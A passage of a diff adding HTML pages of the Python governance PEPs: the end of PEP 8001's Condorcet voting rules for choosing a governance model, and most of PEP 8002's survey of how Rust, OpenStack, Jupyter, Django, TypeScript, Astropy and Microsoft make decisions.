+<a href="https://peps.python.org/pep-8011/">PEP 8011: Python Governance Model Lead by Trio of Pythonistas</a> (Mariatta, Warsaw) (<a href="https://github.com/python/peps/commits/main/pep-8011.rst">changelog</a>)
+<a href="https://peps.python.org/pep-8012/">PEP 8012: The Community Governance Model</a> (Langa) (<a href="https://github.com/python/peps/commits/main/pep-8012.rst">changelog</a>)
+<a href="https://peps.python.org/pep-8013/">PEP 8013: The External Council Governance Model</a> (Dower) (<a href="https://github.com/python/peps/commits/main/pep-8013.rst">changelog</a>)
+<a href="https://peps.python.org/pep-8014/">PEP 8014: The Commons Governance Model</a> (Jansen) (<a href="https://github.com/python/peps/commits/main/pep-8014.rst">changelog</a>)
+<a href="https://peps.python.org/pep-8015/">PEP 8015: Organization of the Python community</a> (Stinner) (<a href="https://github.com/python/peps/commits/main/pep-8015.rst">changelog</a>)
+<a href="https://peps.python.org/pep-8016/">PEP 8016: The Steering Council Model</a> (Smith, Stufft) (<a href="https://github.com/python/peps/commits/main/pep-8016.rst">changelog</a>)
+Further discussion
+
+
+

Options:

+
[x] Private
+[ ] Make this a test poll: read all votes from a file.
+[ ] Do not release results to all voters.
+[x] Enable detailed ballot reporting.
+    [ ] In detailed ballot report, also reveal the identity of the voter with each ballot.
+[ ] Allow voters to write in new choices.
+[ ] Present choices on voting page in exactly the given order.
+[ ] Allow voters to select “no opinion” for some choices.
+[ ] Enforce proportional representation
+
+
+

These options will have the effect of:

+
    +
  • Making the election “private”, or in other words, invite only.
  • +
  • The results of the election will be released to all voters.
  • +
  • The contents of every ballot will be released to the public, along +with a detailed report going over how the winner was elected.
  • +
  • The detailed ballots will not include any identifying information +and the email addresses of the voters will be thrown away by the CIVS +system as soon as the email with their voting link has been sent.
  • +
  • Voters will not be able to write in new choices, meaning they will +be limited only to the options specified in the election.
  • +
  • Voters will not have the ability to change their vote after casting +a ballot. [no-changes]
  • +
  • The default ordering for each ballot will be randomized to remove +any influence that the order of the ballot may have on the election.
  • +
  • Voters will have to rank all choices somehow, but may rank multiple +choices as equal.
  • +
+
+
+

Voting mechanics

+

The vote will be by ranked ballot. Every voter +orders all candidate PEPs from the most preferred to the least +preferred. The vote will be tallied and a winner chosen using the +Condorcet method.

+

Note: each voter can only cast a single vote with no ability to +revise their vote later. [no-changes] If you are not absolutely +sure of your choices, hold off casting your ballot until later in +the voting period. Votes cast on the last day of the election are +just as valid as the ones cast on the first day.

+

While the CIVS system does not provide an option for a “Pure” +Condorcet election, any Condorcet method will select the “Pure” +Condorcet winner if one exists and otherwise only vary if one +doesn’t exist. The CIVS system differentiates between a Condorcet +winner and a non Condorcet winner by stating if the winner was a +Condorcet winner, or if it merely wasn’t defeated versus any other +option. So a winner in the CIVS system will only be accepted if +it states it was a Condorcet winner.

+

In the unlikely case of a tie (or cycle as is possible under the +Condorcet method), a new election will be opened, limited to the +options involved in the tie or cycle, to select a new winner from +amongst the tied options. This new election will be open for a +week, and will be repeated until a single winner is determined.

+
+
+
+

Questions and Answers

+
+

Why the Condorcet method?

+
    +
  1. It allows voters to express preference by ranking PEPs
  2. +
  3. It is consensus decision-making
  4. +
  5. In a poll +open to only core developers and run using Approval voting, it was +the clear preference
  6. +
+
+
+

Is omitting any candidate PEPs in the ranking allowed?

+

A vote which omits candidates in the ranking is invalid. This is +because such votes are incompatible with the desired properties listed +above, namely:

+
    +
  • Making voters consider alternatives, as well as
  • +
  • Doing everything possible to reach a conclusion in a single election.
  • +
+
+
+

Why recommend for dormant core developers to not vote?

+

The choice of the governance model will have far reaching and long-term +consequences for Python and its community. We are inviting core +developers to assess their skin in the game.

+

Note: this is not an edict and will not be policed. We trust all +members of the core team to act in the best interest of Python.

+
+
+

Why should the vote be private?

+

When discussing the election system, a number of core developers expressed +concerns with the idea of having public ballots, with at least one core +developer stating that they were planning on abstaining from voting +altogether due to the use of a public ballot. A poll ran on Discourse +identified the overwhelming majority of voters prefer private ballots. +[private-vote]

+

A secret ballot is considered by many to be a requirement for a free and +fair election, allowing members to vote their true preferences without +worry about social pressure or possible fallout for how they may have +voted.

+
+
+

Why the use of CIVS?

+

In the resulting discussion of this PEP, it was determined that core +developers wished to have a secret ballot. [private-vote] Unfortunately +a secret ballot requires either novel cryptography or a trusted party to +anonymize the ballots. Since there is not known to be any existing novel +cryptographic systems for Condorcet ballots, the CIVS system was chosen to +act as a trusted party.

+

More information about the security and privacy afforded by CIVS, including +how a malicious voter, election supervisor, or CIVS administrator can +influence the election can be found +here.

+
+
+

Why cannot voters change their vote?

+

CIVS does not allow voters to update their vote and as part of its goal +to prevent the election supervisor from being able to influence the +votes.

+
+
+

Are there any deficiencies in the Condorcet method?

+

There is no perfect voting method. It has been shown by the +Gibbard-Satterthwaite theorem +that any single-winner ranked voting method which is not dictatorial +must be susceptible to so-called “tactical voting”. This can lead to +people not voting as they truly believe in order to influence the +outcome.

+

The Condorcet method also has the possibility of having cycles (known as +the Condorcet paradox). +Due to the fact that the Condorcet method chooses a winner based on whether +they would win against the other options in a 1-on-1 race, there is a +possibility that PEP A > PEP B > PEP C > PEP A (or in terms of the game +rock-paper-scissors, imagine a three-player game where someone played rock, +another played paper, and the last person played scissors; no one wins that +game as everyone is defeated by someone). For one analyzed set of real-world +elections with 21 voters or more, a cycle occurred +less than 1.5% of the time..

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8001.rst

+

Last modified: 2023-10-09 23:43:15 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8002/index.html b/pep-8002/index.html new file mode 100644 index 00000000000..b51aa247f27 --- /dev/null +++ b/pep-8002/index.html @@ -0,0 +1,1114 @@ + + + + + + + + PEP 8002 – Open Source Governance Survey | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8002 – Open Source Governance Survey

+
+
Author:
+
Barry Warsaw <barry at python.org>, Łukasz Langa <lukasz at python.org>, +Antoine Pitrou <solipsis at pitrou.net>, Doug Hellmann <doug at doughellmann.com>, +Carol Willing <willingc at gmail.com>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
24-Aug-2018
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP surveys existing and similar open source and free software projects +for their governance models, providing summaries that will serve as useful +references for Python’s own selection of a new governance model in the wake of +Guido’s retirement.

+

Rather than an individual PEP for each of these community surveys, they will +all be collected here in this PEP.

+
+
+

Rationale

+

CPython is not the first open source project to undergo a governance crisis. +Other projects have experimented various governance options, sometimes several +times during their existence. There are useful lessons to take away of their +experience, which will help inform our own decision.

+
+

Project choice

+

There are many open source projects out there, but it will be most fruitful +to survey those which are similar enough to CPython on a couple key metrics:

+
    +
  1. the number of contributors and their activity (there are scaling issues that +don’t make the governance models of very small projects very enlightening +for our purposes) ;
  2. +
  3. being mostly or partly community-driven (company-driven projects can afford +different governance options, since the company hierarchy has power over +the main participants) ;
  4. +
  5. being faced with important design decisions that require a somewhat formal +decision process.
  6. +
+
+
+
+

Rust

+

The governance structure is documented in Rust RFC #1068.

+

The effective governance process grows organically over time without being entirely +codified as RFCs, especially in case of day-to-day operation details. One example is +the formation of Domain Working Groups in +February 2018.

+
+

Key people and their functions

+

In the Rust project there are teams responsible for certain areas. For language features +there is a “lang team”, for tooling there’s “dev tools” and “Cargo”, and so on. +Contentious issues have facilitators to drive discussion who often aren’t the decision +makers. Typically the facilitators are authors of the proposed changes (see +“Controversial decision process” below). They ensure all key decision makers are +involved along with interested community members. They push towards an agreeable +outcome via iteration.

+

In practice this means decisions are rarely escalated to the core team.

+

The most common role of a contributor is team membership. Issue triage/code review +privileges without team membership is rare. Contributors have full commit access, +code ownership separation is based on trust. Writing to the compiler repository is +frowned upon, all changes go through pull requests and get merged by an integration +bot after they were reviewed and approved.

+

New team members are added by nomination by an existing team member.

+
+
+

Regular decision process

+

Primary work happens via GitHub issues and pull requests. Approving a pull request +by any team member allows it to be merged without further process. All merged pull +requests end up in the next stable version of Rust.

+

Notifying relevant people by mentions is important. Listening to the firehose of +e-mails for all GitHub activity is not popular.

+

There are planning and triage meetings open to the public happening on IRC and Discord. +They are not very popular because most of work happens through GitHub. Discussions also +happen on official Rust forums (https://users.rust-lang.org/ and +https://internals.rust-lang.org/). There is a dedicated moderation team responsible for +taking notes and enforcing code of conduct.

+
+
+

Controversial decision process

+

Larger or controversial work goes through a RFC process. It allows everyone to express their thoughts and +iterates towards a resolution. At some point when all blocking concerns of relevant +team members are addressed, they sign off on the RFC and it reaches a “final comment +period”. That does not require consensus amongst all participants, rather there should +not be a strong consensus against the proposal.

+

After 10 days the RFC is merged unless any new blocking concerns are raised by team +members. A “merge” signifies that work towards implementing the feature and integrating +it can now happen without interruption. An RFC doesn’t have to have a reference +implementation for it to be accepted.

+

The other possible results of the “final comment period” are to:

+
    +
  • postpone the RFC (similar to the Deferred status in PEPs),
  • +
  • get it back into discussion if blocking concerns can be addressed, or
  • +
  • close it if blocking concerns are not solvable. When an RFC is marked as +closed, there is a 7-day grace period to debate whether it should be closed.
  • +
+

In practice registering concerns with an RFC happens very often initially but rarely +causes for the RFC to be entirely killed.

+

This process scales well for small-contention changes and/or smaller changes. For the +largest controversial changes the discussion gets unwieldy. This is a topic currently +(as of August 2018) on the minds of the Rust team (see: +“Listening and Trust, part 1”, +“Listening and Trust, part 2”, +“Listening and Trust, part 3”, +“Proposal for a staged RFC process”).

+
+
+

Planning a new release

+

Every six weeks the Rust compiler is released with whatever it contained at the time. +There are no LTS channels or releases yet but this concept is planned to make +redistributors able to keep up with development better.

+

Every few years a so-called “Edition” is released. +Those are milestone releases with full sets of updated documentation and tooling. They +can be backwards incompatible with previous editions. External packages opt into +breaking changes in their crate metadata. The Rust compiler supports all editions that +existed prior to its release. Linking between crates of any supported edition is +possible.

+
+
+

Changes in the process over time

+

The Rust programming language was started by Graydon Hoare who developed it as +a personal project for a few years. When Mozilla started sponsoring the project, +the team slowly grew with Graydon as a BDFL-style figure. He left the project +in 2013. Rust functions without a BDFL since. The RFC process was put in place later. +Initially some design discussions happened during closed-door weekly video meetings +which was shut down +in May 2015 (before the 1.0 release of Rust), organically replaced with open discussion +and direct influence of teams.

+

The number of teams is growing in time. The number of technical decisions made by the +core team is decreasing, instead those get delegated to respective teams.

+

The concept of a “final comment period” was introduced to encourage more public +discussion and enable reacting to a change about to being made, instead of having to +revert a rushed decision that was already made.

+
+
+
+

OpenStack

+

The OpenStack Foundation Bylaws lay out the basic structure for +project governance, with Article IV +delegating day-to-day management of the open source project to the +OpenStack Technical Committee (TC), and The TC member policy +defining broadly how the Technical Committee shall be elected. The TC +publishes a set of more detailed governance documents, including the TC charter, which +describes the team structure, precise rules for establishing +eligibility to run for office, and criteria for establishing the +various electorates.

+
+

Key people and their functions

+

The OpenStack community is made up of many distinct project teams, +responsible for producing different components of the software (block +storage management, compute management, etc.) or managing different +parts of the processes the community follows (such as tracking the +release schedule). Each team is led by a Project Team Lead (PTL), +elected by the Active Project Contributors for that project.

+

Active Project Contributors (APCs) are recent contributors to a given +project team. APC status formally requires two things: becoming an +individual member of the OpenStack Foundation (membership is free) and +having a change merged within the last year (two development cycles) +in a repository managed by a project team.

+

The elected PTL serves a term equal to one development cycle (roughly +6 months). There is no restriction on the number of consecutive terms +a person may serve as PTL, and it is common for someone to serve for +several terms in a row. It is also not unusual for a team to have only +one candidate volunteer to serve as PTL for a given cycle, in which +case there is no need for an election.

+

The PTL represents the team in all cases except where they have +explicitly delegated some responsibility. For example, many teams +designate a separate release liaison to manage the release process +for a development cycle. The PTL also serves as a final decision +maker in cases where consensus cannot be reached between the team +members.

+

While the APCs all vote for the PTL of a team, in many other cases +only the core reviewer team will be consulted on policy decisions +for the team. Anyone may review any patch for any OpenStack +project. After someone demonstrates that they have a good grasp of the +technical issues of a project, that they provide useful feedback on +reviews, and that they understand the direction the project is going, +they may be invited to become a member of the core review team. Unlike +in many other communities, this status does not grant them the right +to submit code without having it reviewed. Rather, it asks them to +commit to reviewing code written by other contributors, and to +participate in team decision-making discussions. Asking someone to +become a member of the core review team is a strong indication of +trust.

+

The Technical Committee (TC) is responsible for managing the +development of OpenStack as a whole. The 13 members of the Technical +Committee are directly elected by APCs from all project teams. Each +member serves a term of two development cycles (roughly 1 year), with +the elections split so that only about half of the members’ terms +expire at any time, to ensure continuity. The TC establishes overall +policies, such as the criteria for adding new project teams, the +deprecation policy for Python 2, testing requirements, etc.

+
+
+

Regular decision process

+

All elections for PTL or TC members use https://civs.cs.cornell.edu to +run a Condorcet election. This system was selected because it +emphasizes consensus candidates over strict popularity.

+

The OpenStack contributor community relies on 3 primary tools for +discussion: the openstack-dev mailing list, +a gerrit code review instance at https://review.openstack.org, and a +set of OpenStack-specific IRC channels on Freenode. There are a few teams +whose contributors are based primarily in China, and they have trouble +accessing IRC. Those teams tend to use alternative platforms such as +WeChat, instead.

+

The tool used for discussing any given decision will vary based on its +weight and impact. Everyone is encouraged to use either the mailing +list or gerrit to support asynchronous discussion across a wider range +of timezones and firewalls, especially for publicizing final +decisions for the rest of the community.

+

Policy decisions limited to a single team are usually made by the core +review team for a project, and the policies and decision processes may +vary between teams. Some groups write down their team policies in +their documentation repository, and use the code review tool (gerrit) +to vote on them. Some teams discuss policies on IRC, either ad hoc or +during a regularly scheduled meeting, and make decisions there. Some +teams use the mailing list for those discussions. The PTL for the team +is responsible for ensuring the discussion is managed and the outcome +is communicated (either by doing so directly or ensuring that the task +is delegated to someone else).

+

All team policy decisions need to be compatible with the overall +policies set by the Technical Committee. Because the TC tends to make +broader governance decisions that apply to the entire contributor +community, the process for discussing and voting on those decisions is +described more formally, including specifying the number of votes +needed to pass and the minimum length of time required for +discussion. For example, most motions require 1/3 of the members (5) +to pass and must stay open at least 3 days after receiving sufficient +votes to pass, ensuring that there is time for dissent to be +registered. See the Technical Committee Charter +and house rules +for more details.

+

Significant design decisions are usually discussed by reviewing a +specification document, somewhat +similar to a PEP, that covers the requirements, alternatives, and +implementation details. Feedback is solicited from all contributors, +and then specifications are eventually approved or rejected by members +of the core review team for a project. Some teams require only 2 +reviewers to approve a design, while other teams require a stronger +indication of consensus before a design is approved. Each team sets a +deadline for approving specifications within each development cycle, to encourage +contributors to work out designs for significant new features early +and avoid risk from changes late in the cycle.

+

Smaller technical decisions are typically made by reviewing the +patch(es) needed to implement the change. Anyone may review any patch +and provide technical feedback, but ultimately two core reviewers for +a team are needed to approve most changes (exceptions are often made +for trivial changes such as typos or for fixes that unblock the CI +gating system).

+
+
+

Controversial decision process

+

Controversial, or merely complicated, decisions frequently expand +outside of specification reviews to mailing list discussions. They +often also result in discussions at one of the regularly scheduled +in-person community gatherings. Because many members of the community +cannot attend these events, the discussions are summarized and final +decisions are made using on-line tools as much as possible.

+

The PTL is responsible for deciding when consensus has been reached +for decisions that affect a single team, and to make a final call in +rare cases where consensus has not been reached and a decision +absolutely needs to be made. The TC acts as a similar decision-making +group of last resort for cases where issues between teams cannot be +resolved in another way. Such escalation of decision-making ends up +being rarely necessary, because the contributors directly involved +generally prefer to come to a consensual agreement rather than +escalate the decision to others.

+
+
+

Planning a new release

+

OpenStack has a major release about every 6 months. These are +coordinated date-based releases, which include the work finished up to +that point in time in all of the member projects. Some project teams +release more often than every 6 months (this is especially true for +teams building libraries consumed by other teams). Those smaller +releases tend to be produced when there is content (new features or +bug fixes) to justify them.

+

The schedule for each development cycle, with deadlines and a final +release date, is proposed by the release management team, in +coordination with the Foundation staff (releases are generally aligned +with the calendar of in-person events), and then the community has an +opportunity to provide feedback before the final dates are set.

+

Decisions about priorities for each development cycle are made at the +team level and the TC level. Core review teams prioritize internal +work, such as fixing bugs and implementing new features. The TC +selects community goals, which +usually require some amount of work from all teams. Agreeing to these +priorities at the start of each cycle helps the teams coordinate their +work, which is especially important because the implementation will +require reviews from multiple team members.

+
+
+

Changes in the process over time

+

Over the last 8 years the number of OpenStack project teams has grown +from 2 to 63. The makeup of the Technical Committee has changed to +accommodate that growth. Originally the TC was made up of PTLs, but as +the membership grew it became impractical for the group to function +effectively.

+

The community also used to be organized around “program areas” rather +than project teams. A program area covered a feature set, such as +gathering telemetry or managing block storage. This organization +failed when multiple teams of people wanted to work on the same +feature set using different solutions. Organizing teams around the +code they deliver allows different teams to have different +interpretations of the same requirements. For example, there are now +several teams working on different deployment tools.

+
+
+
+

Jupyter

+

The governance structure is documented in the Main Governance Document +within the Jupyter Governance repo.

+

The effective governance process grows organically over time as the needs of +the project evolve. Formal changes to the Governance Document are submitted via +Pull Request, with an open period for comments. After the open period, a +Steering Council may call for a vote to ratify the PR changes. Acceptance +requires a minimum of 80% of the Steering Council to vote and at least 2/3 of +the vote must be positive. The BDFL can act alone to accept or reject changes +or override the Steering Council decision; though this would be an extremely +rare event.

+
+

Key people and their functions

+

The key people in Jupyter’s Governance are the BDFL, Fernando Perez, and the +Steering Council. Contributors can be given a special status of core contributor. +Some may also be Institutional Contributors, who are individuals who contribute +to the project as part of their official duties at an Institutional Partner.

+

Fernando Perez, the project founder, is the current and first BDFL. The BDFL +may serve as long as desired. The BDFL succession plan +is described in the Main Governance Document. In summary, the BDFL may appoint +the next BDFL. As a courtesy, it is expected that the BDFL will consult with the +Steering Council. In the event that the BDFL can not appoint a successor, the +Steering Council will recommend one.

+

Core contributors are individuals who are given rights, such as commit privileges, +to act in the best interest of the project within their area of expertise or +subproject. +An existing core contributor typically recommends someone be given +core contributor rights by gathering consensus from project leads, who are +experienced core contributors as listed in the README of the project repo.

+

To be recommended and invited as a Steering Council member, an individual must +be a Project Contributor who has produced contributions that are substantial in +quality and quantity, and sustained over at least one year. Potential Council +Members are nominated by existing Council members and voted upon by the +existing Council after asking if the potential Member is interested and willing +to serve in that capacity.

+
+
+

Regular decision process

+

Project Jupyter is made up of a number of GitHub organizations and subprojects +within those organizations. Primary work happens via GitHub issues and pull +requests. Approving a pull request by any team member allows it to be merged +without further process. All merged pull requests end up in the next stable +release of a subproject.

+

There is a weekly, public Project-wide meeting that is recorded and posted on +YouTube. Some larger GitHub organizations, which are subprojects of +Project Jupyter, e.g. JupyterLab and JupyterHub, may +have additional public team meetings on a weekly or monthly schedule. +Discussions occur on Gitter, the Jupyter mailing list, and most frequently an +open issue and/or pull request on GitHub.

+
+
+

Controversial decision process

+

The foundations of Project Jupyter’s governance are:

+
    +
  • Openness & Transparency
  • +
  • Active Contribution
  • +
  • Institutional Neutrality
  • +
+

During the everyday project activities, Steering Council members participate in +all discussions, code review and other project activities as peers with all +other Contributors and the Community. In these everyday activities, +Council Members do not have any special power or privilege through their +membership on the Council. However, it is expected that because of the quality +and quantity of their contributions and their expert knowledge of the +Project Software and Services that Council Members will provide useful guidance, +both technical and in terms of project direction, to potentially less +experienced contributors.

+

For controversial issues, the contributor community works together to refine +potential solutions, iterate as necessary, and build consensus by sharing +information and views constructively and openly. The Steering Council may +make decisions when regular community discussion doesn’t produce consensus +on an issue in a reasonable time frame.

+
+
+

Voting

+

Rarely, if ever, is voting done for technical decisions.

+

For other Project issues, the Steering Council may call for a vote for a +decision via a Governance PR or email proposal. Acceptance +requires a minimum of 80% of the Steering Council to vote and at least 2/3 of +the vote must be positive.

+

The BDFL can act alone to accept or reject changes or override the Steering +Council decision; though this would be an extremely rare event. As Benevolent, +the BDFL, in practice chooses to defer that authority to the consensus of the +community discussion channels and the Steering Council.

+
+
+

Planning releases

+

Since Project Jupyter has a number of projects, not just a single project, the +release planning is largely driven by the core contributors of a project.

+
+
+

Changes in the process over time

+

The process has remained consistent over time, and the approach has served us +well. Moving forward The Project leadership will consist of a BDFL and +Steering Council. This governance model was a formalization of what +the Project was doing (prior to 2015 when the Main Governance Document was +adopted by the Steering Council), rather than a change in direction.

+
+
+
+

Django

+

The governance structure is documented in Organization of the Django Project.

+
+

Key people and their functions

+

The project recognizes three kinds of contributors. Members of the +core team, the Technical Board, and Fellows. Regular core committers +no longer exercise their “commit bit”, instead they rely on pull +requests being reviewed and accepted. The Technical Board steers +technical choices. Fellows are hired contractors who triage new +tickets, review and merge patches from the committers and community, +including non-trivial ones.

+

Core team members are added by nomination and vote within the core +team, with technical board veto (so far not exercised). Technical +board is elected by and from the core team membership every 18 months +(every major Django release). Sub-teams within the core team are +self-selected by interest.

+
+
+

Regular decision process

+

Most day-to-day decisions are made by Fellows and sometimes other active +core team members.

+

The core team votes on new members which requires a 4/5 majority of +votes cast, no quorum requirement. The Technical Board has veto power. +This power was never exercised

+
+
+

Controversial decision process

+

The Technical Board occasionally approves Django +Enhancement Proposals (DEPs) but those are rare. The DEP process is +roughly modeled after PEPs and documented in DEP 1. +DEPs are mostly used to design major new features, but also for +information on general guidelines and process.

+

An idea for a DEP should be first publicly vetted on the +django-developers mailing list. After it was roughly validated, the +author forms a team with three roles:

+
    +
  • authors who write the DEP and steers the discussion;
  • +
  • implementers who prepare the implementation of the DEP;
  • +
  • a shepherd who is a core developer and will be the primary reviewer +of the DEP.
  • +
+

The DEP’s draft is submitted, assigned a number, and discussed. Authors +collect feedback and steer discussion as they see fit. Suggested venues +to avoid endless open-ended discussions are: separate mailing lists, +Wiki pages, working off of pull requests on the DEP.

+

Once the feedback round is over, the shepherd asks the Technical Board +for review and pronouncement. The Board can rule on a DEP as a team or +designate one member to review and decide.

+

In any case where consensus can’t be reached, the Technical Board has +final say. This was never exercised.

+
+

Differences between DEPs and PEPs

+

The main difference is that the entire workflow is based on pull +requests rather than e-mail. They are pronounced upon by the Technical +Board. They need to have the key roles identified before submission +and throughout the process. The shepherd role exists to guide a DEP +to completion without engaging the Technical Board.

+

Those changes to the process make it more distributed and workable in +a governance model without a BDFL.

+
+
+
+

Planning a new release

+

Releases are done on a fixed time-based schedule, with a major version +every 18 months. With paid Fellows to ensure the necessary work gets +down, on-time releases are routine.

+
+
+

Changes in the process over time

+

Django originally had two BDFLs: Jacob Kaplan-Moss and Adrian Holovaty. +They retired (Adrian’s post, Jacob’s post) +9 years into the project’s history. Following the stepping down, +the DEP process was defined.

+
+
+
+

TypeScript

+

The governance structure is not externally documented besides the +CONTRIBUTING.md +document in the main TypeScript repository.

+
+

Key people and their functions

+

There is a formal design team and a release management team working at +Microsoft. The main person behind the project is currently Anders +Hejlsberg as some of the original members of the team have left the +company.

+
+
+

Regular decision process

+

Microsoft, where the project is developed, has a strong planning culture +so development roadmaps are released long in advanced, notes from +design discussions held at Microsoft get published quickly and meetings +are sometimes broadcast using Skype.

+

External contributions are encouraged through pull requests on GitHub. +Suggestions for new use cases or features are given by issues on GitHub. +This serves like an ad-hoc PEP-like process. There is some discussion +over social media (Twitter) as well.

+
+
+

Controversial decision process

+

Hejlsberg is the central figure of the project in terms of language +design, synthesizing community needs into a cohesive whole. There is +no formal process to externally contribute to the design of the +language.

+

The TypeScript team filters through and integrates community +suggestions. The main advantages of this setup are that there is +strong and consistent design with dependable scheduling and +execution. While there is transparency of intentions and plans, the +disadvantage of this model is that community involvement is limited +to pull requests and suggestions.

+
+
+

Planning a new release

+

Microsoft determines the release schedule, communicates dates and +features well in advance. Nightly builds are usually stable (with +a significant portion of users on this release form).

+

Versioned releases are done every 1 - 3 months, with a roadmap available +on GitHub.

+
+
+

Changes in the process over time

+

TypeScript is likely the first notable project by Microsoft developed +fully in the open (versus source-available).

+

Open-sourcing of TypeScript by Microsoft was a planned feature from the +inception of the project. Before the first open release was made, the +language was driven fully by needs identified by the original teams and +the early in-house users. The initial open-sourcing happened via +the now-defunct Microsoft CodePlex platform. It didn’t have +a well-defined routine of accepting external contributions. Community +engagement rose significantly after the project got moved.

+
+
+
+

Astropy

+
+

Key people and their functions

+

The Astropy Project team’s responsibilities are spread over many different +roles [1], though frequently a person will have several roles.

+

The main body overseeing the Astropy Project is the Astropy +Coordination Committee (CoCo) . Its key roles are dealing with any +financial issues, approving new packages wanting to join the Astropy +Project, approving or rejecting Astropy Proposals for Enhancement +(APEs) [2], and generally anything that’s “leadership”-oriented +or time-sensitive. As of this writing, the committee has four members, +and might grow or shrink as the demands on the committee change.

+
+
+

Regular decision process

+
+

Code-level decisions

+

The Astropy Project includes the core Astropy package and other +affiliated packages. For the sake of simplicity, we will avoid +discussing affiliated packages, which can have their own rules. +Therefore, everything below will concern the core Astropy package.

+

The core Astropy package is organized as sub-packages. Each sub-package +has an official maintainer as well as one or more deputies, who are +responsible for ensuring code is reviewed and generally architecting the +subpackage. Code-level decisions are therefore made in GitHub issues or +pull requests (PRs), usually on the basis of consensus, moderated by the +maintainer and deputies of that sub-package.

+

When there is specific disagreement, majority vote of those who are involved +in the discussion (e.g. PR) determines the winner, with the CoCo called on +to break ties or mediate disagreements.

+
+
+

Non-code decisions

+

Non-code decisions (like sprint scheduling, bugfix release timing, etc) +are usually announced on the astropy-dev mailing list [3] with +a vote-by-message format, or a “if there are no objections”-style message +for highly uncontroversial items. In general, on astropy-dev the expectation +is a concrete proposal which other members are welcome to comment or vote on.

+
+
+

Voting

+

Voting usually involves either using the +1/-1 format on GitHub or the +astropy-dev mailing list. There, any interested person can vote regardless +of their official role in the project, or lack thereof. Furthermore, there +is no veto mechanism for the CoCo to override decisions of the majority.

+
+
+
+

Controversial decision process

+

Simpler controversial decisions are generally discussed on the astropy-dev +mailing list [3], and after a reasonable time either there is +a clear consensus/compromise (this happens most of the time), or the CoCo +makes a decision to avoid stalling.

+

More complicated decisions follow the APE process, which is modeled after the +PEP process. Here, the CoCo makes the final decision after a discussion +period, open to everyone, has passed. Generally the CoCo would follow the +consensus or majority will.

+
+

Ethical issues

+

The Project has an Ombudsperson who ensures there is an alternate contact +for sensitive issues, such as Code of Conduct violations, independent +from the Coordination Committee. In practice, the CoCo, the Community +engagement coordinators and the Ombudsperson would work together privately +to try and communicate with the violator to address the situation.

+
+
+
+

Planning a new release

+

The major release timing is on a fixed schedule (every 6 months); whatever +is in at that time goes in.

+
+
+

Changes in the process over time

+

The CoCo and the “Open Development” ethos came from the inception of the +Project after a series of votes by interested Python-oriented astronomers +and allied software engineers. The core results of that initial discussion +were embodied in the Vision for Astropy document [4].

+

The existence of the formal roles and most of the rest of the above +came as evolutionary steps as the community grew larger, each following +either the APE process, or the regular process of a proposal being brought +up for discussion and vote in astropy-dev [3]. In general all +evolved as sort of ratification of already-existing practices, only after +they were first tested in the wild.

+
+
+

Self-appreciation

+

The fact that anyone who has the time can step in and suggest something +(usually via PR) or vote on their preference, leads to a sense that +“we are all in this together”, leading to better-coordinated effort.

+

Additionally, the function of the CoCo as mostly a tie-breaking body means +that there’s no sense of a dictator who enforces their will, while still +giving clear points of contact for external organizations that are +leery of fully-democratic governance models.

+
+
+

References

+ +
+
+
+

Bonus: Microsoft

+

Despite the selection process for “relevant projects” described above, +it is worthwhile considering how companies that are held financially +accountable for their decisions go about making them. This is not +intended as a readily-usable model for Python, but as additional insight +that may influence the final design or selection.

+

This section is not taken from any official documentation, but has been +abstracted by Steve Dower, a current Microsoft employee, to reflect the +processes that are most applicable to individual projects in the +engineering departments. Role titles are used (and defined) rather than +identifying specific individuals, and all names are examples and should +not be taken as a precise description of the company at any particular +time in history.

+

This is also highly simplified and idealised. There are plenty of +unhealthy teams that do not look like this description, and those +typically have high attrition (people leave the team more frequently +than other teams). Teams that retain their people are usually closer to +the model described here, but ultimately everything involving humans is +imperfect and Microsoft is no exception.

+
+

Key people and their functions

+

Microsoft has a hierarchy that ultimately reports to the CEO. Below the +CEO are a number of organisations, some of which are focused on +engineering projects (as opposed to sales, marketing or other functions). +These engineering organisations roughly break down into significant +product families - for example, there has been a “Windows group”, an +“Xbox group”, and a “server and tools group”. These are typically led by +Executive Vice Presidents (EVPs), who report to the CEO.

+

Below each EVP are many Corporate Vice Presidents (CVPs), each of which +is responsible for one or more products. This level is where the hierarchy +becomes relevant for the purposes of this PEP - the CEO and EVPs are +rarely involved in most decision processes, but set the direction under +which CVPs make decisions.

+

Each product under a CVP has a team consisting of Program Managers +(PMs) and Engineering Managers. Engineering Managers have teams of +engineers who are largely uninvolved in decision making, though may be +used as specialists in some cases. For the rest of this section, +Engineering refers to anyone from the engineering team who is +contributing with a technical-focus, and PM refers to anyone from the +program management team contributing with a customer-focus. After +decisions are made, Engineering does the implementation and testing work, +and PM validates with users that their problem has been solved.

+

(This is actually a huge simplification, to the point where some people +in these roles are offended by this characterisation. In reality, most +people in PM or Engineering do work that crosses the boundary between +the two roles, and so they should be treated as a term describing the +work that somebody is doing in the moment, rather than an identifier or +restriction for a person.)

+

Teams generally represent a feature, while the CVP represents a product. +For example, Visual Studio Code has a CVP who is ultimately responsible +for decisions about that product and its overall direction (in the context +set by their EVP). But many teams contribute features into Visual Studio +Code.

+

For complete clarity, the CEO, EVPs, and CVPs do not ever directly +modify source code. Their entire role is to provide direction for +whoever is immediately below them and to adjudicate on controversial +decisions.

+
+
+

Regular decision process

+

Changes to product code that are not visible to external users are made +solely by Engineering. Individual engineers will be assigned tasks by a +designated engineering manager, or may self-assign. Promotion to +increasingly senior positions generally reflects trust in the +individual’s decision-making ability, and more senior engineers are +trusted to make decisions with less validation from the rest of the team. +Most bugs are covered by this process (that is, fixing a user-visible +problem without changing the intended experience is an Engineering +decision).

+

Decisions affecting users of a particular feature are made by the PM +team for that feature. They will use whatever data sources available to +identify an issue, experiment with alternatives, and ultimately prepare +a design document. Senior members from PM and Engineering will review +designs to clarify the details, and ultimately an artifact is created +that the feature team agrees on. Engineering will use this artifact to +implement the work, and PM will later use this artifact to validate that +the original issue has been resolved.

+

